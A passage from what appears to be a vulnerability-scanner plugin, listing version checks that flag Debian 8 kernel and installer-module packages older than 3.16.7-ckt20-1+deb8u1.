prefix:\"linux-headers-3.16.0-4-586\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-5kc-malta\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-686-pae\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-amd64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-arm64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-armel\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-armhf\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-i386\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-mips\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-mipsel\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-powerpc\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-ppc64el\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-all-s390x\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-amd64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-arm64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-armmp\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-common\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-loongson-2e\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-loongson-2f\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-loongson-3\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-octeon\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-orion5x\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-powerpc\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-powerpc-smp\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-powerpc64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-powerpc64le\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-r4k-ip22\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-r5k-ip32\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-s390x\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-sb1-bcm91250a\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-4-versatile\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-4kc-malta\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-586\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-5kc-malta\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-686-pae\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-686-pae-dbg\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-amd64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-amd64-dbg\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-arm64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-arm64-dbg\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-armmp\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-armmp-lpae\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-ixp4xx\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-kirkwood\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-loongson-2e\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-loongson-2f\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-loongson-3\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-octeon\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-orion5x\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-powerpc\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-powerpc-smp\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-powerpc64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-powerpc64le\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-r4k-ip22\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-r5k-ip32\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-s390x\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-s390x-dbg\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-sb1-bcm91250a\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-4-versatile\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-4\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"loop-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"md-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"minix-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-core-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-core-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-core-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-core-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mmc-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mouse-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mtd-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"multipath-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nbd-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-pcmcia-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-pcmcia-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 